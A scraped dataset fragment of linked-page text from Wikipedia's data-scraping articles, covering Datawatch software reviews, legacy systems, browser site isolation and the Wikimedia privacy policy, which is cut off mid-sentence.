263 | https://en.wikipedia.org/wiki/Data_scraping | https://web.archive.org/web/20160304205109/http://connection.ebscohost.com/c/product-reviews/2235513/data-pump-transforms-host-data | Reports on Datawatch Corp.'s introduction of version 3.0 of its Monarch report software, a data access and analysis tool that lets users view, query, and analyze data from legacy and personal computer systems. Features of the new version; System of operation; Security features; List price. Reports on Datawatch Corp.'s release of an upgraded version of DataSync database middleware tool. Ability to let users selectively download data from a database server; Inclusion of DataSync Development Tool that defines subsets and determines synchronization rules; DataSync Agent's performance... Reports on the shipping of Datawatch Corp.'s DataSync 2.0 for distributing and synchronizing data between database servers and remote personal computer clients. Product description; Pricing; Contact information. Reviews the enterprise reporting software Monarch ES 2.0 from Datawatch Corporation. Reviews Datawatch Corporation's Virex 5.0 software. Reviews the computer software Virex 5.5.1 from Datawatch Corporation. Focuses on Datawatch Corp.'s Monarch 3.04 data-extraction computer software. Ability to store and navigate report information; Usability; Product support; Price; Contact information. INSET: The bottom line.. The article offers information on the Managed Analytics Platform computer software from American software company Datawatch Corp. The article reviews the computer software Monarch Data Pump from Datawatch Corporation. Courtesy of your local library Or enter your postal code and country to search by location: (optional) Are You A Librarian? Are You A Publisher? 2016 by EBSCO Publishing. All Rights Reserved. Privacy Policy Terms of Use |
264 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Legacy_system | In computing, a legacy system is an old method, technology, computer system, or application program, "of, relating to, or being a previous or outdated computer system", 1 yet still in use. Often referencing a system as "legacy" means that it paved the way for the standards that would follow it. This can also imply that the system is out of date or in need of replacement. Legacy code is old computer source code that is no longer supported on standard hardware and environments, and is a codebase that is in some respect obsolete or supporting something obsolete. Legacy code may be written in programming languages, use frameworks and external libraries, or use architecture and patterns that are no longer considered modern, increasing the mental burden and ramp-up time for software engineers who work on the codebase. Legacy code may have zero or insufficient automated tests, making refactoring dangerous and likely to introduce bugs. 2 Long-lived code is susceptible to software rot, where changes to the runtime environment, or surrounding software or hardware may require maintenance or emulation of some kind to keep working. Legacy code may be present to support legacy hardware, a separate legacy system, or a legacy customer using an old feature or software version. While the term usually refers to source code, it can also apply to executable code that no longer runs on a later version of a system, or requires a compatibility layer to do so. An example would be a classic Macintosh application which will not run natively on macOS, but runs inside the Classic environment, or a Win16 application running on Windows XP using the Windows on Windows feature in XP. An example of legacy hardware are legacy ports like PS 2 and VGA ports, and CPUs with older, incompatible instruction sets (with e.g. newer operating systems). Examples in legacy software include legacy file formats like .swf for Adobe Flash or .123 for Lotus 1 2 3, and text files encoded with legacy character encodings like EBCDIC. The first use of the term legacy to describe computer systems probably occurred in the 1960s. 3 By the 1980s it was commonly used to refer to existing computer systems to distinguish them from the design and implementation of new systems. Legacy was often heard during a conversion process, for example, when moving data from the legacy system to a new database. While this term may indicate that some engineers may feel that a system is out of date, a legacy system can continue to be used for a variety of reasons. It may simply be that the system still provides for the users' needs. In addition, the decision to keep an old system may be influenced by economic reasons such as return on investment challenges or vendor lock-in, the inherent challenges of change management, or a variety of other reasons other than functionality. Backward compatibility (such as the ability of newer systems to handle legacy file formats and character encodings) is a goal that software developers often include in their work. Even if a legacy system is no longer used, it may continue to impact the organization due to its historical role. Historic data may not have been converted into the new system format and may exist within the new system with the use of a customized schema crosswalk, or may exist only in a data warehouse. In either case, the effect on business intelligence and operational reporting can be significant. A legacy system may include procedures or terminology which are no longer relevant in the current context, and may hinder or confuse understanding of the methods or technologies used. Organizations can have compelling reasons for keeping a legacy system, such as: Legacy systems are considered to be potentially problematic by some software engineers for several reasons. 4 Where it is impossible to replace legacy systems through the practice of application retirement, it is still possible to enhance (or "re-face") them. Most development often goes into adding new interfaces to a legacy system. The most prominent technique is to provide a Web-based interface to a terminal-based mainframe application. This may reduce staff productivity due to slower response times and slower mouse-based operator actions, yet it is often seen as an "upgrade", because the interface style is familiar to unskilled users and is easy for them to use. John McCormick discusses such strategies that involve middleware. 10 Printing improvements are problematic because legacy software systems often add no formatting instructions, or they use protocols that are not usable in modern PC Windows printers. A print server can be used to intercept the data and translate it to a more modern code. Rich Text Format (RTF) or PostScript documents may be created in the legacy application and then interpreted at a PC before being printed. Biometric security measures are difficult to implement on legacy systems. A workable solution is to use a Telnet or HTTP proxy server to sit between users and the mainframe to implement secure access to the legacy application. The change being undertaken in some organizations is to switch to automated business process (ABP) software which generates complete systems. These systems can then interface to the organizations' legacy systems and use them as data repositories. This approach can provide a number of significant benefits: the users are insulated from the inefficiencies of their legacy systems, and the changes can be incorporated quickly and easily in the ABP software. Model-driven reverse and forward engineering approaches can be also used for the improvement of legacy software. 11 Andreas M. Hein researched the use of legacy systems in space exploration at the Technical University of Munich. According to Hein, legacy systems are attractive for reuse if an organization has the capabilities for verification, validation, testing, and operational history. 12 13 These capabilities must be integrated into various software life cycle phases such as development, implementation, usage, or maintenance. For software systems, the capability to use and maintain the system are crucial. Otherwise the system will become less and less understandable and maintainable. According to Hein, verification, validation, testing, and operational history increases the confidence in a system's reliability and quality. However, accumulating this history is often expensive. NASA's now retired Space Shuttle program used a large amount of 1970s-era technology. Replacement was cost-prohibitive because of the expensive requirement for flight certification. The original hardware completed the expensive integration and certification requirement for flight, but any new equipment would have had to go through that entire process again. This long and detailed process required extensive tests of the new components in their new configurations before a single unit could be used in the Space Shuttle program. Thus any new system that started the certification process becomes a de facto legacy system by the time it is approved for flight. Additionally, the entire Space Shuttle system, including ground and launch vehicle assets, was designed to work together as a closed system. Since the specifications did not change, all of the certified systems and components performed well in the roles for which they were designed. 14 Even before the Shuttle was scheduled to be retired in 2010, NASA found it advantageous to keep using many pieces of 1970s technology rather than to upgrade those systems and recertify the new components. Some in the software engineering prefer to describe "legacy code" without the connotation of being obsolete. Among the most prevalent neutral conceptions are source code inherited from someone else and source code inherited from an older version of the software. Eli Lopian, CEO of Typemock, has defined it as "code that developers are afraid to change". 15 Michael Feathers 16 introduced a definition of legacy code as code without tests, which reflects the perspective of legacy code being difficult to work with in part due to a lack of automated regression tests. He also defined characterization tests to start putting legacy code under test. Ginny Hendry characterized creation of code as a challenge to current coders to create code that is "like other legacies in our lives—like the antiques, heirlooms, and stories that are cherished and lovingly passed down from one generation to the next. What if legacy code was something we took pride in? . 17 The term legacy support is often used in conjunction with legacy systems. The term may refer to a feature of modern software. For example, Operating systems with "legacy support" can detect and use older hardware. The term may also be used to refer to a business function; e.g. a software or hardware vendor that is supporting, or providing software maintenance, for older products. A "legacy" product may be a product that is no longer sold, has lost substantial market share, or is a version of a product that is not current. A legacy product may have some advantage over a modern product making it appealing for customers to keep it around. A product is only truly "obsolete" if it has an advantage to nobody—if no person making a rational decision would choose to acquire it new. The term "legacy mode" often refers specifically to backward compatibility. A software product that is capable of performing as though it were a previous version of itself, is said to be "running in legacy mode". This kind of feature is common in operating systems and internet browsers, where many applications depend on these underlying components. The computer mainframe era saw many applications running in legacy mode. In the modern business computing environment, n-tier, or 3 tier architectures are more difficult to place into legacy mode as they include many components making up a single system. Virtualization technology is a recent innovation allowing legacy systems to continue to operate on modern hardware by running older operating systems and browsers on a software system that emulates legacy hardware. Programmers have borrowed the term brownfield from the construction industry, where previously developed land (often polluted and abandoned) is described as brownfield. 18 There is an alternate favorable opinion—growing since the end of the Dotcom bubble in 1999—that legacy systems are simply computer systems in working use: "Legacy code" often differs from its suggested alternative by actually working and scaling. IT analysts estimate that the cost of replacing business logic is about five times that of reuse, 19 even discounting the risk of system failures and security breaches. Ideally, businesses would never have to rewrite most core business logic: debits credits is a perennial requirement. The IT industry is responding with "legacy modernization" and "legacy transformation": refurbishing existing business logic with new user interfaces, sometimes using screen scraping and service-enabled access through web services. These techniques allow organizations to understand their existing code assets (using discovery tools), provide new user and application interfaces to existing code, improve workflow, contain costs, minimize risk, and enjoy classic qualities of service (near 100% uptime, security, scalability, etc.). 20 This trend also invites reflection on what makes legacy systems so durable. Technologists are relearning the importance of sound architecture from the start, to avoid costly and risky rewrites. The most common legacy systems tend to be those which embraced well-known IT architectural principles, with careful planning and strict methodology during implementation. Poorly designed systems often don't last, both because they wear out and because their inherent faults invite replacement. Thus, many organizations are rediscovering the value of both their legacy systems and the theoretical underpinnings of those systems. |
265 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Site_isolation | Site isolation is a feature in certain web browsers that allow cross-origin sites to be isolated from each other. The feature was originally proposed by Charles Reis and others, with subsequent iterations from Microsoft, in the form of their implementation of the feature in the Gazelle research browser. However, the feature failed to gain traction due to issues surrounding its implementation and performance concerns. In 2018, following the disclosure of the Spectre and Meltdown vulnerabilities to the public, Google started work on adding site isolation in Chrome eventually culminating in a 2019 release of the feature. In 2021, Firefox also launched their own version of site isolation which they had been working on under the codename Project Fission. Despite the security benefits of this feature, researchers have also found security issues surrounding various aspects of this feature. These include issues with the perceived protection against transient attacks such as Spectre and Meltdown, as well as new timing and resource exhaustion attacks enabled by this feature. Until 2017, the predominant security architecture of major browsers adhered to the process-per-browsing-instance model. This entailed the browser comprising distinct sandboxed processes, including the browser process, GPU process, networking process, and rendering process. The rendering process would engage with other privileged services when necessary to execute elevated actions when viewing a web page. 1 2 Although this model successfully prevented problems associated with malicious JavaScript gaining access to the operating system, it lacked the capability to isolate websites from each other adequately. 3 Despite these concerns, the adoption of a more robust model faced limited traction due to perceived issues with newer models, particularly those related to performance and memory. 4 5 In 2017, the disclosure of Spectre and Meltdown exploits, however, altered this landscape. Previously accessing arbitrary memory was complicated requiring a compromised renderer. However with Spectre, attacks were developed that abused Javascript features to read almost all memory in the rendering process, including memory storing potentially sensitive information from previously rendered cross-origin pages. 6 7 This exposed the issues of the process-per-instance security model. Consequently, a new security architecture that allowed the separation of the rendering of different web pages into entirely isolated processes was required. 8 7 In 2009, Reis et al. proposed the first version of the process-per-site model to isolate web pages based on the page's web origin. 9 This was improved upon in 2009 by the Gazelle research browser, which separated specific document frames based on their web principal, a security barrier that corresponded with the specific document that was being loaded. 10 11 Around the same time, work was also being done on the OP (which would later become the OP2 browser), IBOS, Tahoma and the SubOS browsers all of which proposed different paradigms to solve the issue of process separation amongst sites. 12 13 In 2019, Reis, et al of the Google Chrome project presented a paper at USENIX Security 14 that detailed changes to their existing browser security model in response to the recent research proving that the Spectre attack could be used inside the rendering process of the browser. 15 16 The paper proposed changes to the model that borrowed from Reis et al.'s work in 2009. 17 Chrome's implementation of site isolation would use web origins as a primary differentiator of a 'site' at a process level. 18 19 Additionally, the Chrome team also implemented the idea of website frames being executed out of process, a feature that had been suggested by the authors of the Gazelle web browser, as well as the OP and OP2 web browsers. 12 This required a significant re-engineering of Chrome's process handling code, involving to more than 4000 commits from 320 contributors over a period of 5 years. 20 Chrome's implementation of site isolation allowed it to eliminate multiple universal cross-site scripting (uXSS) attacks. 21 uXSS attacks allow attackers to compromise the same-origin policy, granting unrestricted access to inject and load attacker controlled javascript on other website. 22 The Chrome team found that all 94 uXSS attacks reported between 2014 and 2018 would be rendered ineffective by the deployment of site isolation. 23 In addition to this, the Chrome team also claimed that their implementation of site isolation would be effective at preventing variations of the Spectre and Meltdown group of timing attacks that relied on the victim address space being on the same process as the attacker process. 16 In March 2021, the Firefox development team announced that they would also roll out their implementation of site isolation. This feature had been in development for multiple months under the codename Project Fission. 24 Firefox's implementation fixed a few of the flaws that had been found in Chrome's implementation namely the fact that similar web pages were still vulnerable to uXSS attacks. 25 26 The project also required a rewrite of the process handling code in Firefox. 27 Before 2019, site isolation had only been implemented by research browsers. Site isolation was considered to be resource intensive 5 due to an increase in the amount of memory space taken up by the processes. 28 This performance overhead was reflected in real world implementations as well. 29 Chrome's implementation of site isolation on average took one to two cores more than the same without site isolation. 5 Additionally, engineers working on the site isolation project observed a 10 to 13 percent increase in memory usage when site isolation was used. 30 31 Chrome was the industry's first major web browser to adopt site isolation as a defense against uXSS and transient execution attacks. 32 To do this, they overcame multiple performance and compatibility hurdles, and in doing so, they kickstarted an industry-wide effort to improve browser security. However, despite this, certain aspects of Spectre's defenses have been found lacking. 6 In particular, site isolation's ability to defend against timing attacks has been found to be incomplete. 33 In 2021, Agarwal et al. were able to develop an exploit called Spook.js that was able to break Chrome's Spectre defenses and exfiltrate data across web page in different origins. 34 In the same year, researchers at Microsoft, were able to leverage site isolation to perform a variety of timing attacks that allowed them to leak cross-origin information by careful manipulation of the inter-process communication protocols employed by site isolation. 35 In 2023, researchers at Ruhr University Bochum showed that they were able to leverage the process architecture required by site isolation to exhaust system resources and also perform advanced attacks like DNS poisoning. 36 |
266 | https://en.wikipedia.org/wiki/Web_scraping | https://foundation.wikimedia.org/wiki/Special:MyLanguage/Policy:Privacy_policy | It may not be circumvented, eroded, or ignored by Wikimedia Foundation officers or staff nor local policies of any Wikimedia project. Because we believe that you should not have to provide personal information to participate in the free knowledge movement, you may: Because we want to understand how Wikimedia Sites are used so we can make them better for you, we collect some information when you: We are committed to: Be aware: The Wikimedia Foundation is the nonprofit organization that operates collaborative, free knowledge websites, like Wikipedia, Wikimedia Commons, and Wiktionary. This Policy explains how we collect, use, and share your Personal Information. By using Wikimedia Sites, you consent to this Policy. The Wikimedia movement is founded on a simple, but powerful principle: we can do more together than any of us can do alone. We cannot work collectively without gathering, sharing, and analyzing information about our users as we seek new ways to make the Wikimedia Sites more usable, safer, and more beneficial. We believe that information-gathering and use should go hand-in-hand with transparency. This Privacy Policy explains how the Wikimedia Foundation, the non-profit organization that hosts the Wikimedia Sites, like Wikipedia, collects, uses, and shares information we receive from you through your use of the Wikimedia Sites. It is essential to understand that, by using any of the Wikimedia Sites, you consent to the collection, transfer, processing, storage, disclosure, and use of your information as described in this Privacy Policy. That means that reading this Policy carefully is important. We believe that you should not have to provide nonpublic Personal Information to participate in the free knowledge movement. You do not have to provide things like your real name, address, or date of birth to sign up for a standard account or contribute content to the Wikimedia Sites. We do not sell or rent your Personal Information, nor do we give it to others to sell you anything. We use it to figure out how to make the Wikimedia Sites more engaging and accessible, to see which ideas work, and to make learning and contributing more fun. Put simply: we use this information to make the Wikimedia Sites better for you. After all, it is people like you, the champions of free knowledge, who make it possible for the Wikimedia Sites to not only exist, but also grow and thrive. We recognize that only a minority of you are familiar with technical terms like "tracking pixels" and "cookies" used in the Privacy Policy. Whether you are brand new to privacy terminology or you are an expert who just wants a refresher, you might find our Glossary of Key Terms helpful. Because everyone (not just lawyers) should be able to easily understand how and why their information is collected and used, we use common language instead of more formal terms throughout this Policy. To help ensure your understanding of some particular key terms, here is a table of translations: Except as explained below, this Privacy Policy applies to our collection and handling of information about you that we receive as a result of your use of any of the Wikimedia Sites. This Policy also applies to information that we receive from our partners or other third parties. To understand more about what this Privacy Policy covers, please see below. For the sake of clarity, this Privacy Policy covers, regardless of language: This Privacy Policy, however, does not cover some situations where we may gather or process information. For example, some uses may be covered by separate privacy policies (like those of the Wikimedia Shop) or sites or services run by third parties (such as third-party developer projects on Wikimedia Cloud Services). To understand more about what this Privacy Policy does not cover, please see below. This section is part of the Privacy Policy and is meant to explain in detail which situations are not covered by our Privacy Policy. Sometimes, volunteers may place a data-collecting tool, such as a script, gadget, tracking pixel, or share button, on a Wikimedia Site without our knowledge. This Policy does not cover how third parties handle the information they receive as a result of such a tool. If you come across such a third-party tool, and you believe it violates this Policy, you can remove the tool yourself, or report it to privacy at wikimedia.org so we can investigate. Where community policies govern information, such as the CheckUser policy, the relevant community may add to the rules and obligations set out in this Policy. However, they are not permitted to create new exceptions or otherwise reduce the protections offered by this Policy. Whatever you post on Wikimedia Sites can be seen and used by everyone. When you make a contribution to any Wikimedia Site, including on user or discussion pages, you are creating a permanent, public record of every piece of content added, removed, or altered by you. The page history will show when your contribution or deletion was made, as well as your username (if you are signed in) or your IP address (if you are not signed in). We may use your public contributions, either aggregated with the public contributions of others or individually, to create new features or data-related products for you or to learn more about how the Wikimedia Sites are used, as further explained below in the "How We Use Information We Receive From You" section of this Privacy Policy. Unless this Policy says otherwise, you should assume that information that you actively contribute to the Wikimedia Sites, including Personal Information, is publicly visible and can be found by search engines. Like most things on the Internet, anything you share may be copied and redistributed throughout the Internet by other people. Please do not contribute any information that you are uncomfortable making permanently public, like revealing your real name or location in your contributions. You should be aware that specific data made public by you or aggregated data that is made public by us can be used by anyone for analysis and to infer further information, such as which country a user is from, political affiliation and gender. You do not need to create an account to use any Wikimedia Site. If you do create an account, you do not need to give us your name or email address (although you can if you choose to, such as for the "Email this user" feature for example). If you do not create an account, your contributions will be publicly attributed to your IP address. Want to create an account? Great Do not want to create an account? No problem You are not required to create an account to read or contribute to a Wikimedia Site, except under rare circumstances. However, if you contribute without signing in, your contribution will be publicly attributed to the IP address associated with your device. If you want to create a standard account, in most cases we require only a username and a password. However, if you choose not to provide an email address, we cannot help you recover your password. Your username will be publicly visible, so please be careful about revealing your real name or other Personal Information in your username. Your password is only used to verify that the account is yours. Your IP address is also automatically submitted to us, and we record it temporarily. This is to protect Wikimedia users and project content; in the event of abuse, IP addresses may be associated with usernames as part of an investigation. No other Personal Information is required: no name, no email address, no date of birth, and no credit card information. Once created, user accounts cannot be removed entirely (although you can usually hide the information on your user page if you choose to). This is because your public contributions must be associated with their author (you ). In some circumstances, the Wikimedia communities can assist users with removing additional information related to their account from the projects. To gain a better understanding of the demographics of our users, to localize our services and to learn how we can improve our services, we may ask you for more demographic information, such as gender or age, about yourself. We will tell you if such information is intended to be public or private, so that you can make an informed decision about whether you want to provide us with that information. Providing such information is always completely optional. If you do not want to, you do not have to—it is as simple as that. Some features we offer work better if we know what area you are in. If you consent, we can use GPS (and other technologies commonly used to determine location) to show you more relevant content. We keep information obtained by these technologies confidential, except as provided in this Policy. You can learn more by checking out the list of examples of how we use these technologies in our FAQ. Sometimes, we automatically receive location data from your device. For example, if you want to upload a photo on the Wikimedia Commons mobile app, we may receive metadata, such as the place and time you took the photo, automatically from your device. Please be aware that, unlike location information collected using GPS signals described above, the default setting on your mobile device typically includes the metadata in your photo or video upload to the Wikimedia Sites. If you do not want metadata sent to us and made public at the time of your upload, please change your settings on your device. Finally, when you visit any Wikimedia Site, we automatically receive the IP address of the device (or your proxy server) you are using to access the Internet, which could be used to infer your geographical location. We use certain technologies to collect information about how you use Wikimedia Sites. Like other websites, we receive some information about you automatically when you visit the Wikimedia Sites. We also use a variety of commonly-used technologies, like cookies, to collect information regarding how you use the Wikimedia Sites, make our services safer and easier to use, and to help create a better and more customizable experience for you. We want to make the Wikimedia Sites better for you by learning more about how you use them. Examples of this might include how often you visit the Wikimedia Sites, what you like, what you find helpful, how you get to the Wikimedia Sites, and whether you would use a helpful feature more if we explained it differently. We also want this Policy and our practices to reflect our community's values. For this reason, we keep information related to your use of the Wikimedia Sites confidential, except as provided in this Policy. Because of how browsers work, we receive some information automatically when you visit the Wikimedia Sites. This includes when you use an online tool on a third-party site that loads information coming from the Wikimedia Sites. This information includes the type of device you are using (possibly including unique device identification numbers, for some beta versions of our mobile applications), the type and version of your browser, your browser's language preference, the type and version of your device's operating system, in some cases the name of your internet service provider or mobile carrier, the website that referred you to the Wikimedia Sites, which pages you request and visit, and the date and time of each request you make to the Wikimedia Sites. Put simply, we use this information to enhance your experience with Wikimedia Sites. For example, we use this information to administer the sites, provide greater security, and fight vandalism; optimize mobile applications, customize content and set language preferences, test features to see what works, and improve performance; understand how users interact with the Wikimedia Sites, track and study use of various features, gain understanding about the demographics of the different Wikimedia Sites, and analyze trends. We use a variety of commonly-used technologies, like cookies, to understand how you use the Wikimedia Sites, make our services safer and easier to use, and to help create a better and more customizable experience for you. We actively collect some types of information with a variety of commonly-used technologies. These generally include tracking pixels, JavaScript, and a variety of "locally stored data" technologies, such as cookies and local storage. These types of technologies may also be used in online tools on a third-party site that loads information from the Wikimedia Sites. We realize that some of these technologies do not have the best reputation in town and can be used for less-than-noble purposes. So we want to be as clear as we can about why we use these methods and the type of information we collect with them. Depending on which technology we use, locally stored data may include text, Personal Information (like your IP address), and information about your use of the Wikimedia Sites (like your username or the time of your visit). See below for more information. We use this information to make your experience with the Wikimedia Sites safer and better, to gain a greater understanding of user preferences and their interaction with the Wikimedia Sites, and to generally improve our services. We will never use third-party cookies, unless we get your permission to do so. If you ever come across a third-party data collection tool that has not been authorized by you (such as one that may have been mistakenly placed by another user or administrator), please report it to us at privacy wikimedia.org. Locally stored data, JavaScript, and tracking pixels help us do things like: Want to know even more? You can read more about some of the specific cookies we use, when they expire, and what we use them for in our FAQ. We believe this data collection helps improve your user experience, but you may remove or disable some or all locally stored data through your browser settings, depending on your browser. You can learn more about some options you have in our FAQ. While locally stored data may not be necessary to use our sites, some features will not function properly if you disable locally stored data. While the examples above concerning information about you collected through the use of data collection tools are kept confidential in accordance with this Policy, please note that some information about the actions taken by your username is made publicly available through public logs alongside actions taken by other users. For example, a public log may include the date your account was created on a Wikimedia Site along with the dates that other accounts were created on a Wikimedia Site. We and our service providers use your information for the legitimate purpose of pursuing our charitable mission, including: We engage in these activities to manage our relationship with you, because we have a legitimate interest and or to comply with our legal obligations. We will customize the Services, in some instances, with your consent; or in keeping with our legitimate interest. We will send these types of emails to you only with your consent except as otherwise permitted by applicable law. We do not sell, rent, or use your email address to advertise third-party products or services to you. You can manage what kinds of notifications you receive and how often you receive them by going to your Notifications Preferences and User profile. You can learn more about email and notifications and how to change your preferences in our FAQ. We will always tell you, at the time we give you an opportunity to share your thoughts, how we plan on using your answers and any Personal Information you provide. Your responses to our surveys and feedback requests are always optional. We will email these types of requests to you only with your consent except as otherwise permitted by applicable law. You can manage what kinds of notifications you receive and how often you receive them by going to your Notifications Preferences and User profile. You can learn more about email and notifications and how to change your preferences in our FAQ. We engage in these activities to further our legitimate interest and or to comply with our legal obligations. As stated above, we can use commonly-used location technologies to show you more relevant content. For example, our mobile apps can identify articles from the Wikimedia sites about points of interest near your location. As a reminder, you can consent to and or deactivate our access to these location technologies at any time for example through the native OS functionalities on your mobile device, and still use the Wikimedia Sites. As stated above, we may automatically receive location data from your device. For example, if you upload a photo using the Wikimedia Commons mobile app, please be aware that the default setting on your mobile device typically results in the metadata associated with your photo being included in the upload. As a reminder, if you do not want metadata sent to us and made public at the time of your upload, please change your settings on your device. When you visit any Wikimedia Site, we automatically receive the IP address of the device (or your proxy server) you are using to access the Internet, which could be used to infer your geographical location. We keep IP addresses confidential, except as provided in this Policy. If you are visiting Wikimedia Sites with your mobile device, we may use your IP address to provide anonymized or aggregated information to service providers regarding the volume of usage in certain areas. We use this location information to make your experience with the Wikimedia Sites safer and better, to gain a greater understanding of user preferences and their interaction with the Wikimedia Sites, and to generally improve our services. For example, we use this information to provide greater security, optimize mobile applications, and learn how to expand and better support Wikimedia communities. We also use Personal Information in the manner described in the sections of this Policy titled "For Legal Reasons" and "To Protect You, Ourselves Others. We use and share your Personal Information when you give us specific permission to do so, for legal reasons, and in the other circumstances described below. We share your Personal Information for a particular purpose, if you agree. For example, if you receive a scholarship and we ask permission to share your Personal Information with a local chapter. You can find more information in the list of examples in our FAQ. We will disclose your Personal Information to public authorities or other persons in response to an official legal process only if we believe it to be legally valid. See also our Requests for user information procedures and guidelines. We will notify you of such requests when possible. We do so to further our legitimate interest and or to comply with our legal obligations. We will access, use, preserve, and or disclose your Personal Information if we reasonably believe it necessary to satisfy a valid and legally enforceable warrant, subpoena, court order, law or regulation, or other judicial or administrative order. However, if we believe that a particular request for disclosure of a user's information is legally invalid or an abuse of the legal system and the affected user does not intend to oppose the disclosure themselves, we will try our best to fight it. We are committed to notifying you via email at least ten (10) calendar days, when possible, before we disclose your Personal Information in response to a legal demand. However, we may only provide notice if we are not legally restrained from contacting you, there is no credible threat to life or limb that is created or increased by disclosing the request, and you have provided us with an email address. Nothing in this Privacy Policy is intended to limit any legal objections or defenses you may have to a third-party's request (whether it be civil, criminal, or governmental) to disclose your Personal Information. We recommend seeking the advice of legal counsel immediately if such a request is made involving you. For more information, see our Subpoena FAQ. In the unlikely event that the ownership of the Foundation changes, we will provide you 30 days' notice before any Personal Information is transferred to the new owners or becomes subject to a different privacy policy. In the extremely unlikely event that ownership of all or substantially all of the Foundation changes, or we go through a reorganization (such as a merger, consolidation, or acquisition), consistent with our legitimate interest, we will continue to keep your Personal Information confidential, except as provided in this Policy, and provide notice to you via the Wikimedia Sites and a notification on WikimediaAnnounce-L or similar mailing list at least thirty (30) calendar days before any Personal Information is transferred or becomes subject to a different privacy policy. We, or users with certain administrative rights, use and disclose Personal Information that is reasonably necessary to: We do so to manage our relationship with you, to further our legitimate interest, and or to comply with our legal obligations. We, or particular users with certain administrative rights as described below, need to use and share your Personal Information if it is reasonably believed to be necessary to enforce or investigate potential violations of our Terms of Use, this Privacy Policy, or any Wikimedia Foundation or user community-based policies. We may also need to access and share Personal Information to investigate and defend ourselves against legal threats or actions. Wikimedia Sites are collaborative, with users writing most of the policies and selecting from amongst themselves people to hold certain administrative rights. These rights may include access to limited amounts of otherwise nonpublic information about recent contributions and activity by other users. They use this access to help protect against vandalism and abuse, fight harassment of other users, and generally try to minimize disruptive behavior on the Wikimedia Sites. These various user-selected administrative groups have their own privacy and confidentiality guidelines, but all such groups are supposed to agree to follow our Access to nonpublic personal data policy. These user-selected administrative groups are accountable to other users through checks and balances: users are selected through a community-driven process and overseen by their peers through a logged history of their actions. However, the legal names of these users are not known to the Wikimedia Foundation. We hope that this never comes up, but we may disclose your Personal Information if we believe that it is reasonably necessary to prevent imminent and serious bodily harm or death to a person, or to protect our organization, employees, contractors, users, or the public. We may also disclose your Personal Information if we reasonably believe it necessary to detect, prevent, or otherwise assess and address potential spam, malware, fraud, abuse, unlawful activity, and security or technical concerns. (Check out the list of examples in our FAQ for more information.) We disclose Personal Information to our third-party service providers or contractors to help run or improve the Wikimedia Sites and provide services in support of our mission. We use third-party service providers or contractors to help run or improve the Wikimedia Sites for you and other users. We give access to your Personal Information to these providers or contractors as needed to perform their services for us or to use their tools and services. We put requirements, such as confidentiality agreements, in place to help ensure that these service providers treat your Personal Information consistently with, and no less protective of your privacy than, the principles of this Policy. For further information, please see our FAQ. If you are visiting Wikimedia Sites with your mobile device, we use your IP address to provide anonymized or aggregated information to service providers regarding the volume of usage in certain areas. Some of our service providers ask us to post links to their privacy policies; a list of these service providers and links to their policies can be found on this page. The open-source software that powers the Wikimedia Sites depends on the contributions of volunteer software developers, who spend time writing and testing code to help it improve and evolve with our users' needs. To facilitate their work, we give some developers limited access to systems that contain your Personal Information, but only as reasonably necessary for them to develop and contribute to the Wikimedia Sites. Similarly, we share non-Personal Information or aggregated information with researchers, scholars, academics, and other interested third parties who wish to study the Wikimedia Sites. Sharing this Personal Information helps them understand usage, viewing, and demographics statistics and patterns. They then can share their findings with us and our users so that we can all better understand and improve the Wikimedia Sites. When we give access to Personal Information to third-party developers or researchers, we put requirements, such as reasonable technical and contractual protections, in place to help ensure that these service providers treat your Personal Information consistently with the principles of this Policy and in accordance with our instructions. If these developers or researchers later publish their work or findings, we ask that they not disclose your Personal Information. Please note that, despite the obligations we impose on developers and researchers, we cannot guarantee that they will abide by our agreement, nor do we guarantee that we will regularly screen or audit their projects. (You can learn more about re-identification in our FAQ.) Information that you post is public and can be seen and used by everyone. Any information you post publicly on the Wikimedia Sites is just that public. For example, if you put your mailing address on your talk page, that is public, and not specifically protected by this Policy. And if you edit without registering or logging into your account, your IP address will be seen publicly. Please think carefully about your desired level of privacy before you disclose Personal Information on your user page or elsewhere. We use a variety of physical and technical measures, policies, and procedures to help protect your Personal Information from unauthorized access, use, or disclosure. We strive to protect your Personal Information from unauthorized access, use, or disclosure. We use a variety of physical and technical measures, policies, and procedures (such as access control procedures, network firewalls, and physical security) designed to protect our systems and your Personal Information. Unfortunately, there is no such thing as completely secure data transmission or storage, so we cannot guarantee that our security will not be breached (by technical measures or through violation of our policies and procedures). We will never ask for your password by email (but may send you a temporary password via email if you have requested a password reset). If you ever receive an email that requests your password, please let us know by sending it to privacy wikimedia.org, so we can investigate the source of the email. Except as otherwise stated in this Policy, we only keep your Personal Information as long as necessary to maintain, understand and improve the Wikimedia Sites or to comply with applicable law. Once we receive Personal Information from you, we keep it for the shortest possible time that is consistent with the maintenance, understanding, and improvement of the Wikimedia Sites, and our obligations under applicable law. In most instances, Personal Information is deleted, aggregated or de-identified after 90 days. Non-Personal Information may be retained indefinitely as appropriate. (Check out the list of examples in our FAQ.) Please remember that when you make a contribution to any Wikimedia Site, the page history will show when your contribution was made, your username (if you are signed in), or your IP address (if you edit while not logged in). The transparency of the projects' contribution and revision histories is critical to their efficacy and trustworthiness. To learn more about our data retention practices, see our data retention guidelines. If you would like to request access to or removal of your Personal Information, you may contact us. For information about how you may request removal of your Personal Information, or other rights you may have with respect to your Personal Information, see our FAQ. If you would like to request to access, update or restrict object to the processing of Personal Information, or receive a copy of your Personal Information for purposes of transmitting it to another organization, you may Contact Us. We will respond to your request consistent with applicable law. Please note also that you may be able to exercise some of these rights without our intervention. For example, if you are a registered user, you can access and update some Personal Information in your Preferences, as well as download your user account data. You may also manage what kinds of notifications you receive and how often you receive them by going to your Notifications Preferences. For the protection of the Wikimedia Foundation and other users, if you do not agree with this Privacy Policy, you may not use the Wikimedia Sites. The Wikimedia Foundation is a non-profit organization based in San Francisco, California, with servers and data centers located in the U.S. If you decide to use Wikimedia Sites, whether from inside or outside of the U.S., you understand that your Personal Information will be collected, transferred, stored, processed, disclosed and otherwise used in the U.S. as described in this Privacy Policy. You also understand that your information may be transferred by us from the U.S. to other countries, which may have different or less stringent data protection laws than your country, in connection with providing services to you. We are strongly committed to protecting users' Personal Information. Under this Policy, we may share your information only under particular situations, which you can learn more about in the "When May We Share Your Information" section of this Privacy Policy. In particular, we do not share your Personal Information for marketing purposes. Because we protect all users in accordance with this Privacy Policy, we do not change our behavior in response to a web browser's "do not track" signal. For more information regarding Do Not Track signals and how we handle them, please visit our FAQ. Substantial changes to this Policy will not be made until after a 